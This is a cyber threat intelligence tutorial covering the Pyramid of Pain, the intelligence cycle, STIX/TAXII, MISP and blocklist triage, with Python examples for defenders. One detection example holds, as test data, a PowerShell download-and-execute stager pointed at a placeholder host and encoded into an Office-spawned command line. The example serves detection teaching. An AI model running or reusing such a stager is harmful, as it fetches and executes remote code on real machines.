"Data is not Intelligence." A list of 10,000 bad IP addresses is Data. Knowing that "APT29 is targeting financial institutions in Germany using a specific PDF exploit" is Intelligence. CTI is the process of collecting, analyzing, and disseminating information about threats to empower better decision-making.

The Pyramid of Pain

David Bianco's Pyramid of Pain ranks indicator types by how much it costs the attacker when you detect on them. From bottom to top: hash values, IP addresses, domain names, network/host artifacts, tools, and finally TTPs.
Bottom (Easy): Hash values, IP addresses. Trivial for attackers to change: recompiling a binary changes the hash, and renting a new VPS changes the IP.
Top (Hard): TTPs (Tactics, Techniques, and Procedures). If you detect the behavior (e.g., an Office document that always launches an encoded PowerShell command, followed by lateral movement over WMI), you force them to reinvent their tradecraft rather than just rotate infrastructure.
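The following is an added example, not code from the original article. It runs a hash blocklist (bottom of the pyramid) and a behavioural rule (top of the pyramid) over constructed process-creation events from two weeks of the same intrusion; the attacker recompiles the payload between the two, so the hash changes while the Office-spawns-encoded-PowerShell tradecraft does not. The event fields, file names and digests are all constructed for the example.

```python
"""Added example (not from the original article): the same intrusion detected
at two levels of the Pyramid of Pain.  A hash blocklist (bottom) and a
behavioural rule (top, a TTP) are run over constructed process-creation
events.  Between week 1 and week 2 the attacker recompiles the dropped
payload, so its hash changes, but the tradecraft (an Office process
launching an encoded PowerShell stager) does not.  Every event, path and
digest below is constructed for this example."""

from __future__ import annotations

import base64
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcessEvent:
    """One process-creation record (field names are illustrative)."""
    parent: str      # parent image name
    image: str       # new process image name
    cmdline: str     # full command line
    sha256: str      # hash of the new process image


def encoded_ps(script: str) -> str:
    """powershell -EncodedCommand expects base64 of the UTF-16LE script."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/s')"

# Placeholder digests (not real samples).  Week 1's payload hash is what the
# vendor report published; week 2 is the same tool recompiled.
PS_SHA256 = "11" * 32
WEEK1_PAYLOAD = "aa" * 32
WEEK2_PAYLOAD = "bb" * 32

WEEK1 = [
    ProcessEvent("explorer.exe", "powershell.exe", "powershell.exe -File backup.ps1", PS_SHA256),
    ProcessEvent("winword.exe", "powershell.exe",
                 f"powershell.exe -nop -w hidden -enc {encoded_ps(STAGER)}", PS_SHA256),
    ProcessEvent("powershell.exe", "upd.exe", r"C:\Users\a\AppData\Local\Temp\upd.exe", WEEK1_PAYLOAD),
]
WEEK2 = [
    ProcessEvent("excel.exe", "powershell.exe",
                 f"powershell.exe -w hidden -ec {encoded_ps(STAGER)}", PS_SHA256),
    ProcessEvent("powershell.exe", "svc.exe", r"C:\Users\b\AppData\Local\Temp\svc.exe", WEEK2_PAYLOAD),
    ProcessEvent("winword.exe", "splwow64.exe", "splwow64.exe 12288", "dd" * 32),
]

# Bottom of the pyramid: the hash from the report.
HASH_BLOCKLIST = {WEEK1_PAYLOAD}

# Top of the pyramid: an Office application spawning PowerShell with an encoded
# command.  The regex accepts the parameter abbreviations powershell.exe accepts.
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-e(?:c|n|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}")


def hash_hits(events: list[ProcessEvent]) -> list[ProcessEvent]:
    """Events whose image hash is on the blocklist."""
    return [e for e in events if e.sha256 in HASH_BLOCKLIST]


def ttp_hits(events: list[ProcessEvent]) -> list[ProcessEvent]:
    """Events matching the behavioural (TTP) rule."""
    return [e for e in events
            if e.parent.lower() in OFFICE_APPS
            and e.image.lower() == "powershell.exe"
            and ENCODED_FLAG.search(e.cmdline)]


def detections(events: list[ProcessEvent]) -> dict[str, int]:
    """Count hits per pyramid level so the two weeks can be compared."""
    return {"hash": len(hash_hits(events)), "ttp": len(ttp_hits(events))}


if __name__ == "__main__":
    for label, week in (("week 1", WEEK1), ("week 2", WEEK2)):
        print(label, detections(week))
```

In week 1 both rules fire; in week 2 the hash rule is silent because the payload was rebuilt, while the TTP rule still catches the Office-to-PowerShell chain. The benign admin script launched from explorer.exe and the print spooler child of Word do not trigger either rule.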

1. The Intelligence Cycle

CTI follows the classic intelligence cycle inherited from military and government intelligence:

  1. Direction: The CISO asks: "Are we vulnerable to the new Ransomware hitting hospitals?"
  2. Collection: Gathering raw logs, Dark Web forum posts, OSINT, and paid feeds.
  3. Processing: Normalizing the raw collections (CSV exports, vendor JSON, free-text reports) into one common format such as STIX so they can be correlated.
  4. Analysis: Connecting the dots. "This IP sits in the same subnet that was used in the SolarWinds campaign." On its own that is a weak link (a shared subnet is low-confidence evidence), so analysis also means corroborating it before anyone acts on it.
  5. Dissemination: Delivering the report to the Firewall team (block the IP) and the Board (approve budget for new XDR).
  6. Feedback: Did the intelligence help? Refine the requirements.

2. Levels of Intelligence

Level        Audience                      Example
-----------  ----------------------------  ------------------------------------------------------------------------
Strategic    Board / C-Suite               "Ransomware attacks in our sector increased 200%. We need cyber insurance."
Operational  SOC Manager / IR Lead         "Group X targets our staff with social engineering via LinkedIn. Alert HR."
Tactical     SOC Analyst / Firewall Admin  "Block IP 203.0.113.4 and hash a1b2c3..."

3. Standards: STIX & TAXII

To share intelligence automatically between machines (e.g., from a national CERT to your bank), both sides need a common language and a common transport.

3.1. STIX (Structured Threat Information Expression)

A JSON-based language for describing threats. STIX 2.1 defines domain objects (indicator, malware, threat-actor, campaign, ...), relationship objects that link them, and a pattern language for indicators. Instead of saying "bad IP", we say:

{ "type": "indicator", "name": "Malicious IP used by Lazarus Group", "pattern": "[ipv4-addr:value = '198.51.100.1']", "valid_from": "2023-01-01T00:00:00Z", "labels": ["malicious-activity"] }

3.2. TAXII (Trusted Automated Exchange of Intelligence Information)

The transport layer: an HTTPS REST API (TAXII 2.1) for exchanging STIX objects. Clients discover API roots, list collections, and pull objects from (or push objects to) a collection; the response is an envelope of STIX objects rather than a bundle. Think of STIX as the package and TAXII as the truck delivering it.
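Added example (not code from the original page, OASIS or any TAXII server): a STIX 2.1 bundle built by hand for the indicator shown above plus the actor it is attributed to, wrapped in the envelope a TAXII 2.1 server returns from its collection objects endpoint, and then the consumer logic a firewall team would run over it. The objects, IDs, timestamps and the second (expired) indicator are constructed; nothing is fetched over the network.

```python
"""Added example (not from the original page): a STIX 2.1 bundle built by hand,
wrapped in the envelope a TAXII 2.1 server returns for
GET /{api-root}/collections/{id}/objects/, and the consumer logic a firewall
team would run over it.  All objects, IDs and timestamps are constructed here;
no real feed is contacted, and the indicator IP addresses come from the
RFC 5737 documentation ranges."""

from __future__ import annotations

import json
import re
import uuid
from datetime import datetime, timezone

TS = "2023-01-01T00:00:00.000Z"


def stix_id(obj_type: str) -> str:
    """STIX 2.1 identifier: '<type>--<UUIDv4>'."""
    return f"{obj_type}--{uuid.uuid4()}"


def common(obj_type: str, **props) -> dict:
    """Properties every STIX domain/relationship object must carry."""
    return {"type": obj_type, "spec_version": "2.1", "id": stix_id(obj_type),
            "created": TS, "modified": TS, **props}


def make_bundle() -> dict:
    """Constructed bundle: one actor, two indicators (one already expired) and
    the 'indicates' relationship that OpenCTI would draw as an edge."""
    actor = common("threat-actor", name="Lazarus Group",
                   threat_actor_types=["nation-state"])
    live = common("indicator", name="Malicious IP used by Lazarus Group",
                  pattern_type="stix",
                  pattern="[ipv4-addr:value = '198.51.100.1']",
                  valid_from=TS, indicator_types=["malicious-activity"])
    stale = common("indicator", name="Retired C2 address",
                   pattern_type="stix",
                   pattern="[ipv4-addr:value = '198.51.100.2']",
                   valid_from="2022-01-01T00:00:00.000Z",
                   valid_until="2022-12-31T00:00:00.000Z",
                   indicator_types=["malicious-activity"])
    rel = common("relationship", relationship_type="indicates",
                 source_ref=live["id"], target_ref=actor["id"])
    # A STIX 2.1 bundle carries only type, id and objects.
    return {"type": "bundle", "id": stix_id("bundle"),
            "objects": [actor, live, stale, rel]}


def taxii_envelope(bundle: dict) -> dict:
    """TAXII 2.1 does not transport the bundle itself: the objects endpoint
    returns an envelope {"more": bool, "objects": [...]} with media type
    application/taxii+json;version=2.1."""
    return {"more": False, "objects": bundle["objects"]}


IPV4_EQUALS = re.compile(r"ipv4-addr:value\s*=\s*'([0-9.]+)'")


def parse_ts(value: str) -> datetime:
    """STIX timestamps are RFC 3339 in UTC with a trailing 'Z'."""
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def blocklist_from_envelope(envelope: dict, now: datetime | str) -> list[str]:
    """Return the IPv4 addresses that are safe to block *right now*: only
    non-revoked STIX-pattern indicators inside their validity window."""
    if isinstance(now, str):
        now = parse_ts(now)
    addrs: set[str] = set()
    for obj in envelope["objects"]:
        if obj.get("type") != "indicator" or obj.get("revoked"):
            continue
        if obj.get("pattern_type") != "stix":   # e.g. 'snort' or 'yara' patterns
            continue
        if parse_ts(obj["valid_from"]) > now:
            continue
        if "valid_until" in obj and parse_ts(obj["valid_until"]) <= now:
            continue
        # Minimal extraction: equality comparisons on ipv4-addr:value.  A real
        # consumer should use a STIX pattern parser to handle AND/OR/ranges.
        addrs.update(IPV4_EQUALS.findall(obj["pattern"]))
    return sorted(addrs)


if __name__ == "__main__":
    env = taxii_envelope(make_bundle())
    print(json.dumps(env, indent=2))
    print(blocklist_from_envelope(env, datetime.now(timezone.utc)))
```

The consumer deliberately ignores the threat-actor and relationship objects (they are context for analysts, not something a firewall can act on) and drops the indicator whose valid_until has passed, which is the mechanism that keeps a feed from growing into the million-entry list nobody will deploy.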

4. Tools: MISP & OpenCTI

You need a platform to store this data.

4.1. MISP (Malware Information Sharing Platform)

The industry standard (open source). It allows organizations to share "events": a case with its attributes (IPs, domains, hashes, ...) and context. If Bank A gets hacked, they upload the IoCs to MISP, and Bank B (synchronized with the same MISP instance) receives them and can block them before they get hit. This is herd immunity. In practice the blocking is not blind: only attributes the analyst flagged with to_ids are exported to IDS/firewall feeds, and MISP's warninglists exist to keep addresses such as public DNS resolvers or CDN ranges out of a blocklist.

4.2. OpenCTI

A modern, graph-based platform built on the STIX 2.1 data model. Every object and relationship is stored as a node and an edge ("This file -> indicates -> this IP -> attributed to -> this threat actor") and visualized, which helps analysts see the bigger picture and pivot between related entities.

5. OSINT (Open Source Intelligence)

A large share of useful intelligence comes from open sources: vendor reports, code repositories, paste sites, certificate transparency logs, WHOIS and passive DNS, social media. You just have to find it, and record where it came from so it can be verified later.

The Golden Rule

Intelligence must be ACTIONABLE. If you give the firewall team a list of 1 million IPs to block, they will ignore you. If you give them 5 IPs that are definitely attacking the company right now, they will thank you. Quality over Quantity.
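Added example, serving both the MISP section and the Golden Rule (it is not MISP's own code or PyMISP): a MISP event export, constructed here in MISP's JSON shape with only the fields the logic reads populated, is reduced to the short, vetted blocklist the firewall team will actually apply. Each rejected value is returned with its reason, so the analyst can explain what was filtered. The allow-and-deny ranges are RFC 5737 documentation and RFC 1918 addresses.

```python
"""Added example (not MISP's own code): turning a MISP event export into the
short, vetted blocklist the firewall team will actually apply.  The event JSON
below is constructed in MISP's export shape; only the fields the logic reads
(type, value, to_ids, deleted, timestamp) are populated.  Addresses come
from RFC 5737 documentation ranges or RFC 1918."""

from __future__ import annotations

import ipaddress
from datetime import datetime, timedelta, timezone


def epoch(y: int, m: int, d: int) -> str:
    """MISP stores attribute timestamps as epoch seconds in a string."""
    return str(int(datetime(y, m, d, tzinfo=timezone.utc).timestamp()))


# Constructed event: what a sharing partner might push to your MISP instance.
MISP_EVENT = {
    "Event": {
        "id": "42",
        "info": "Constructed example: phishing infrastructure",
        "threat_level_id": "1",          # 1 = High
        "date": "2023-05-30",
        "Attribute": [
            # Vetted C2 address the analyst flagged for IDS/firewall export.
            {"type": "ip-dst", "value": "198.51.100.7", "to_ids": True,
             "deleted": False, "timestamp": epoch(2023, 5, 28)},
            # Same address entered a second time by another analyst.
            {"type": "ip-dst", "value": "198.51.100.7", "to_ids": True,
             "deleted": False, "timestamp": epoch(2023, 5, 29)},
            # Context only: to_ids left off (shared hosting, not vetted).
            {"type": "ip-dst", "value": "203.0.113.9", "to_ids": False,
             "deleted": False, "timestamp": epoch(2023, 5, 28)},
            # An internal address that leaked into the event.
            {"type": "ip-src", "value": "10.0.0.5", "to_ids": True,
             "deleted": False, "timestamp": epoch(2023, 5, 28)},
            # Stale: infrastructure from months ago, probably re-assigned by now.
            {"type": "ip-dst", "value": "192.0.2.33", "to_ids": True,
             "deleted": False, "timestamp": epoch(2023, 1, 2)},
            # Soft-deleted in MISP after a false-positive report.
            {"type": "ip-dst", "value": "192.0.2.44", "to_ids": True,
             "deleted": True, "timestamp": epoch(2023, 5, 28)},
            # Not an IP: belongs to the DNS/proxy team, not the firewall.
            {"type": "domain", "value": "example.invalid", "to_ids": True,
             "deleted": False, "timestamp": epoch(2023, 5, 28)},
        ],
    }
}

FIREWALL_TYPES = {"ip-dst", "ip-src"}

# Ranges a perimeter firewall must never be told to block: RFC 1918, loopback,
# link-local.  Add your own public prefixes here.  (ipaddress.is_private is
# not used because it also flags the RFC 5737 example ranges used above.)
NEVER_BLOCK = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]


def triage(event: dict, now: str, max_age_days: int = 90) -> tuple[list[str], dict[str, str]]:
    """Return (blocklist, dropped): the values worth sending to the firewall and,
    for every rejected value, the reason it was left out."""
    ref = datetime.fromisoformat(now.replace("Z", "+00:00"))
    cutoff = ref - timedelta(days=max_age_days)
    keep: set[str] = set()
    dropped: dict[str, str] = {}
    for attr in event["Event"]["Attribute"]:
        value = attr["value"]
        if attr["type"] not in FIREWALL_TYPES:
            dropped[value] = f"type {attr['type']} is not a firewall indicator"
            continue
        if attr.get("deleted"):
            dropped[value] = "attribute soft-deleted in MISP"
            continue
        if not attr.get("to_ids"):
            dropped[value] = "to_ids is false: analyst did not vet it for blocking"
            continue
        seen = datetime.fromtimestamp(int(attr["timestamp"]), tz=timezone.utc)
        if seen < cutoff:
            dropped[value] = f"stale: last updated {seen.date()}"
            continue
        try:
            ip = ipaddress.ip_address(value)
        except ValueError:
            dropped[value] = "not a valid IP address"
            continue
        if any(ip in net for net in NEVER_BLOCK):
            dropped[value] = "internal/reserved range: blocking it would self-DoS"
            continue
        keep.add(value)
    return sorted(keep), dropped


if __name__ == "__main__":
    blocklist, rejected = triage(MISP_EVENT, "2023-06-01T00:00:00Z")
    print("block:", blocklist)
    for value, reason in rejected.items():
        print(f"drop {value}: {reason}")
```

Seven attributes go in, one address comes out, and every exclusion is explainable. That is what makes the list actionable: the firewall team gets a handful of current, vetted, externally routable addresses rather than the raw event.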